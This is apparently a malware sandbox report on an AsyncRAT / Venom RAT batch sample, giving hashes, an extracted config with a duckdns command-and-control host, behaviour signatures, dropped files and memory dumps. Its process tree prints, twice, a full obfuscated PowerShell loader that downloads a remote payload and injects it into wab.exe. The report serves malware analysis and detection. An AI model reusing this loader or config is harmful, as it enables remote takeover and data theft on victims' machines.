asyncrat | e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728

General

Target

las.cmd
Size

6KB
MD5

1b315096e07f2cbe4bb1dae37bf115e5
SHA1

183d4109803b7de7f8c679e5cf12d215bd6b3871
SHA256

e199e310df7ed728f62ded7f850def8787e53b2e35a3534d20409976dfa87728
SHA512

b7d3fa6cbb79537c827bf80b29c0be4b11036922717d05ae79e301071651c7a1cbcf114fa1b9b0459e874c01de24bc78d67f171ecc9bba09f0ba039a7fea2683
SSDEEP

96:k+m8Z1rXchtQtvV3c7FK+37kcu/WlJVhe9glzjAqvko644Omqnds29D6tCmXPWC7:B6hQOKM7kc3De9glzjFkFXCj9DACy

Score

10^/10

asyncrat venom clients execution rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

xvern429.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
5	2188	powershell.exe
7	2188	powershell.exe
9	2188	powershell.exe
12	2188	powershell.exe
14	2188	powershell.exe
16	2188	powershell.exe
18	2188	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2188 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

676 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1960 powershell.exe
676 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1960 set thread context of 676 1960 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2188 powershell.exe
1960 powershell.exe
1960 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1960 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2188 powershell.exe
Token: SeDebugPrivilege 1960 powershell.exe
Token: SeDebugPrivilege 676 wab.exe

pid	process
2188	powershell.exe

pid	process
676	wab.exe

pid	process
1960	powershell.exe
676	wab.exe

description	pid	process	target process
PID 1960 set thread context of 676	1960	powershell.exe	wab.exe

pid	process
2188	powershell.exe
1960	powershell.exe
1960	powershell.exe

pid	process
1960	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	676	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2948 wrote to memory of 2188	2948	cmd.exe	powershell.exe
PID 2948 wrote to memory of 2188	2948	cmd.exe	powershell.exe
PID 2948 wrote to memory of 2188	2948	cmd.exe	powershell.exe
PID 2188 wrote to memory of 848	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 848	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 848	2188	powershell.exe	cmd.exe
PID 2188 wrote to memory of 1960	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 1960	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 1960	2188	powershell.exe	powershell.exe
PID 2188 wrote to memory of 1960	2188	powershell.exe	powershell.exe
PID 1960 wrote to memory of 2256	1960	powershell.exe	cmd.exe
PID 1960 wrote to memory of 2256	1960	powershell.exe	cmd.exe
PID 1960 wrote to memory of 2256	1960	powershell.exe	cmd.exe
PID 1960 wrote to memory of 2256	1960	powershell.exe	cmd.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe
PID 1960 wrote to memory of 676	1960	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\las.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
3⤵
PID:848

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Vanddraabes = 1;$Precautioning='Sub';$Precautioning+='strin';$Precautioning+='g';Function Forfladigelsens($Tusmrkets152){$Tsp=$Tusmrkets152.Length-$Vanddraabes;For($velours=5;$velours -lt $Tsp;$velours+=6){$Ventin+=$Tusmrkets152.$Precautioning.Invoke( $velours, $Vanddraabes);}$Ventin;}function Inddatafiler223($Dorathea){. ($Rull) ($Dorathea);}$Gianthood=Forfladigelsens ' Ame.MBirtho terszunchaiEnepilSynkrlReassaGasco/ Pan,5Gub.e. Stat0Sjlen Stab,(Tilh,WGod eiVilstn kompd UndeoSalpiwH lhes Symp G njaNSp,ciTReam. maal1genne0matem.Euro,0 Norm;Hed,s HjnelW iegfiPneu n Opfl6Preim4induk;Cleis unc,nxDecon6 Glob4Unbra;Stutt Krsenr.ybbjvMatri:Tende1F rku2 Lejl1Under.Impu.0Gy,ur)ordre redepGRela.eStaalc rofokB,nhao Cart/Cy ni2.ubdi0Ag ic1.emix0Re.ie0Myrmi1Under0 yndi1 Lyst AnticF UnshiSylphrur.nvePhotof Te to Akkox Stup/Pleje1 Purc2 Cela1Ko,me.Enarb0,orca ';$Varmepudes=Forfladigelsens ' ammeUDelitsWatere.ejdsrDemon- UnreALeap gHennee UltrnIrreftLandb ';$Radernes=Forfladigelsens 'SpildhKrsustSotadtPreinp ,lamsTillb:Satis/ Gust/Shamew mergwHierowGend..Scia s ResyeReinfn IndkdQueevsDdsdopE cepaevangcGyptoeErnri.OffercUnf.ioOv.rbmBrugs/VandepUnf lrLsri.oSubst/Censud Prehl.arak/Mccar7LinalyRdkriiUnpe,2Se,vif Dewwu ety ';$Koglespillets=Forfladigelsens 'Flyvn>Overb ';$Rull=Forfladigelsens 'K emsiTvilleCampbxmodul ';$Hvervende='Limpindene';$Bondages = Forfladigelsens 'Forvae,uculcPredohmar,no Stan Hande%hvidvaTrio,pCampsp Unt dwhupoa ,ntetSprudaHyper% ieth\Te,tiPAnstrrRestaeTysseaSyconfNyklaf FdeaiSecanrOksekmPicayaB,saat TubeiAttrivMunkeeMadag.OvercSUndeppLapidoK.pit Dulge&Dimme& Betu Aabene ViolcSaumohzenogoCh,pp Godl,tRyota ';Inddatafiler223 (Forfladigelsens 'Ant a$SandwgFac,il,rojeo anaabTrskeaBilfrl Nons:Chl,rT Un,erEjakuoVed umMissolMatche U.denCircudL.lyaeOpsam= Ufor(B.ligcSmudsmfortidBalka Oligo/Skri.c ,ype Krysa$ gejrBTriano.enkrnUaf jdSiph.aAltingAegereGenfosFlip,)Densi ');Inddatafiler223 (Forfladigelsens ' Ena $F ralgForlalStenloBryggb Nonea Un,tlHokus:RanomU udennCreatf UdmuoUdr drDiatokE,dkkeP,eendNmousnAz,cyeSaftfsV.llasS.ces= A.pr$HaspeRFj.rnaSlui.d KommeUnd,frFillin Tubie Sttts Afde.UnhelsMn.dep Ano lTilreiC rpotReflu(orgia$ StjeKCorreosyningKateglBade eLavtrsApporpR.turiHydrolherrel ,apoeExemptInrolsDinos)A ato ');$Radernes=$Unforkedness[0];$Yojuane= (Forfladigelsens '.irma$DissogIndfjl BordoForfebUnconaDonn lCeleb:IndicSByggem BanipBilleiC.alisH.rsktun.eroMar,il .etreQui krPres.nBoha.eK,rne=,larmNNona,eCosufwShort-CriolOkarspb HebejOverde Troccsner,t rypt stagnS R,vaySepa sB.idgt XyloeBinnomGymno.RekviNNoc aeKajentResub.NiveaWDentieRandsb CistCFin llportriFrekveenfamnNondot');$Yojuane+=$Tromlende[1];Inddatafiler223 ($Yojuane);Inddatafiler223 (Forfladigelsens 'Clown$ entrS UnubmRhetipLns.ai Congs SablthusbeoPolynlBacche LedorEmmennHandeeteren. D.phHS,elleEpizzaRiverdStande Maalr silis Trla[Vadeh$Al.idVCor ia AnverUnminm Pe,oeB.pappVakkeuTakstdSublue Potes Dd.a]Mic,o=Kauti$ ShipG RegiiSamleaLyasen CycltCr pihBrockoExpuloRide,dV,cif ');$Squarsonry=Forfladigelsens 'Damps$ PrivSGendrmPh.nep UnsniNeu os TrultAfgrio EleclSyntaebarstrGe.chnFurfueFa cr.MissaD KostoSv.jfwRigsanGluemlUlfbjoCupolaAarskdproroFHoreqiTrappl StemeK,nto(Howls$ UngaR.ositaProtudSkidseen,lerRetsmn s,ineEschesB.ast,Priva$Em erGDesidoParocoBi.lid BuksbasconyBesg eSpins)s mle ';$Goodbye=$Tromlende[0];Inddatafiler223 (Forfladigelsens 'Be,hy$Hutl.gBeniglOve.soCamdebMogstapo.yglSensi:PalamI .hlonafstitIntraeHoatcrpethimLan,meAutodnVrdiesHollatTamoyrPenn uvengeuNonprm Lati5 Tigh3Flust=Ellio(Tira TBort,eKillisPlanltDries- KompPGulliaForbitSjaskhdynej Dibl,$ YikiGTjrekoPolsgo UdendPyramblsesayFlag.eC ole)Aft.e ');while (!$Intermenstruum53) {Inddatafiler223 (Forfladigelsens 'Chir,$ ibrogBli.zle,ektoSpadebSna.kaBoliglL nti:i ternJulemuPlatim Fi,tdRati.aNedfo=.iber$Anke.tChe.irbassiuSintre,orec ') ;Inddatafiler223 $Squarsonry;Inddatafiler223 (Forfladigelsens 'Anth,S Axunt Bak aKon,orEsop.tForsi-NonunSKrukkl.ntepeGrusveEnforpSkrue ,enne4Gangl ');Inddatafiler223 (Forfladigelsens 'Dosse$NaturgsuperlFibroo Met b Pu.laVulcal Torn: Upf,IS.rrenPolystSurfae NonsrBrusemFlydeeFrisenlandisFortrtPou rrS,aaluAp lluUniqumFiref5Burgj3,ncur= Grun(FondsTExcogeEn,elsStimetSpirk-underP CecaaForsatUltr h Par uansg$SelvaG DoleoSo,peo ,hardkommabinjoiyAfprieSkend)Chil, ') ;Inddatafiler223 (Forfladigelsens 'Crabl$vand.gHavnelslidsomanifb YderaFerielImmi.:klapnL C.amaBajadrTeknoy RabunBrugtg CurviFrimrtlysbeuTai psBerti= bra $.lanlgPolarl Repro R krbLivssaFordylStor :S,orkUMetacnInhalm TeleiTropes ,krotFilopaKancek S.skaIndrebBe ynlnazieeSub e+ugand+Supra%Fatn.$DefekU K idn Ven fTilfjoUnderrTrva,kGongleSpintdFgtemnTilt.eSerrasa,cons anon.Hulruc Mul.olametu Sil nBost,tTache ') ;$Radernes=$Unforkedness[$Laryngitus];}$Samojedens=284462;$Stabelstolen=28909;Inddatafiler223 (Forfladigelsens 'Thera$EksklgStikklP ppeoCharlb TriaaGran lKlipp:VarioA.etakcTube,rRo,usu Afgrxgond perli= P pe AconiG,quipe KemitGodk,- GregCSup ooep lonDucklt DomseRemolnCa,iltUn.er Boe,$Spor GRing oImpeto NewfdSuk.ebIntelyHofteeSl,mr ');Inddatafiler223 (Forfladigelsens 'Kanta$ FigggSmutvlDiamaoEnkelb .ushaUko rlLater:Sam eASagnenTjenet SkysiArtissRatoneTanz mF.ageiS,ibstDipetsDe,ar Unken= Alph Midda[DumheSVattey esmas Bi,tt Subme T.nemOut,l.DeterC Irraoyeme,n Cod.vindfle HaarrTorpetJe aa]Udste:Sys,o: CeilFSubphr S.peoCliv,mShib.B Udsta ChemsSomate G uc6,efra4LidleSMagiatCountr Arisi Ho pnAugusgS,jen(Stere$Far aAs bircUnknorDaktyu remaxRe,re)mouth ');Inddatafiler223 (Forfladigelsens 'nonph$TonesgTppeflv.lifoGummib Smr.aEp chlHe.lo:.ersoQPolysu P.oga Tubur.yreseHalftn RometHedonePerisn Q adeOtt n .ank=Ordbo Ik af[un urSSkrueyKaktusCo.dit Fer.eExophmMedde.maadeT JerseInterxIndhftAllio. ntenE CharnVrelscSminkoD.ivedScuddiBrnepnVejargenerv] Over:Jenna:BeregA Win,SmarthCSemifI .nknIEnebo. B.stGInopieAtelytApocoSA mlnt krarOversiChok,nCalamgPairm( D,ss$Pa phAWire nFinantHo ekiKi,desUn ueeepistmIndesiPapistmedlesNonp,) ecur ');Inddatafiler223 (Forfladigelsens 'Winep$ AfvrgUn,arlUddanoSpoejb .amiaChoktlskabe:TvrdrVMandoaB.bler AdvomA etotBroomv CribaEthalnSymbodBervesAmygdbSyddaaJac.rdBevgeeDis,iaForbrnDaases SdvatTelphaHi.selBe potK,adrebrambnGimle=Serie$AlcyoQOsmomuS,ksaaLegeor ObjeeAnthenHomott Bas,eRabatnJoenseKvote. Ush s I.dkuReddsb GhafsSmit.tStormrUn usiDrernn Unasg apit(Flusj$Meta SNummeaDeadpmDrag o ouvrjGer.ieClabudMorbre Stann,avnestunes,Subcu$r,velSen yst.stelaGlacibQ,eereRemonl Palms .andt multo B.rglSoereeV,jrsnUp.al)unsla ');Inddatafiler223 $Varmtvandsbadeanstalten;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Preaffirmative.Spo && echo t"
4⤵
PID:2256

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:676

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
28e92544872d0b6c7ce136ae5f85967b

SHA1
370ca5f83b009d3ada6a51e1119258cee0240441

SHA256
85fd45f77abcd98cb23297f9aa7578dd90c2fc52386b75cc6a82c0d168699f55

SHA512
7af87071335727f82139dca5a9b896ced86f7fc3910091c6116bdd52993fc133c086d84e037b35277c1a0a9fb00e86a918bd5aabbbe4f5ca7a05e749e5b0a0cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
33a4d90a513e5565c19ab49b041a50e9

SHA1
e2cad253a2f696cfea53b6db07afbc18ec0fe7af

SHA256
864adaee0723ce3811e60ddd8ffc11e7580bb11a209383c60cfad6742fd037a3

SHA512
783801b294e5c10b1183842d5de0b99122bca7d3c3473092cbcb53e42992375b412d05c7521ebf62ea4f86851ce036fc0a6f669dcb60d3dbb75b7d437d96056e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
5cb0877ba70831a2f088d6307171b266

SHA1
63143f17c4f316b9b2188084e0b090b2a13ef4ed

SHA256
323416beaec6aa1f22721a16a40973fe49ba2f99405ce029e118124552601455

SHA512
124d4094e0af39f4de0bc2707423a9474e19c39d41bd29092b8f341277cf4cb1807ba20988603925a7b6918197bd0ce49a688b2d28c48755eeeceeb362b9dd15

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7C08.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E56NI23K90CVK8XU5J78.temp
Filesize
7KB

MD5
09d0529011d61544d353acf8da5ad5ea

SHA1
1760eaf3a8a1532646f1d31f48de762915ea9915

SHA256
c26471cbd8bc36c389d15efc65591472967bf277cdcfac7dc316a49192246798

SHA512
18831381404aac28617fe03eb6a90954d43e3c75572c8f8a82842e354cb662b4c9b7a048729f91d140b9f290732ffcb0f24798fb8311c0b777b83ab68a5d4ae6

Download Submit
C:\Users\Admin\AppData\Roaming\Preaffirmative.Spo
Filesize
408KB

MD5
2012051e619942968ded1f085ec39637

SHA1
f90b37de2d7d3a42be724ede56fcaebf200b18e8

SHA256
cb6359c5489ad4e7eabe7ee810752d2ae5d305cf060ad345950cbbc9f9460c82

SHA512
17f73368229c4f7daea3ef2d6e1d7ae75b06571ad0576a556b49e50634aa065e49dafa95eb5da4af0d393619abed8a68a92928c5797f240ce799bc93e0aeb053

Download Submit
memory/676-132-0x0000000000570000-0x0000000000586000-memory.dmp

Filesize
88KB

Download
memory/676-130-0x0000000000570000-0x00000000015D2000-memory.dmp

Filesize
16.4MB

Download
memory/1960-98-0x0000000006770000-0x00000000082A6000-memory.dmp

Filesize
27.2MB

Download
memory/2188-11-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-10-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-9-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-8-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-4-0x000007FEF53FE000-0x000007FEF53FF000-memory.dmp

Filesize
4KB

Download
memory/2188-99-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-100-0x000007FEF53FE000-0x000007FEF53FF000-memory.dmp

Filesize
4KB

Download
memory/2188-7-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2188-131-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

Filesize
9.6MB

Download
memory/2188-5-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing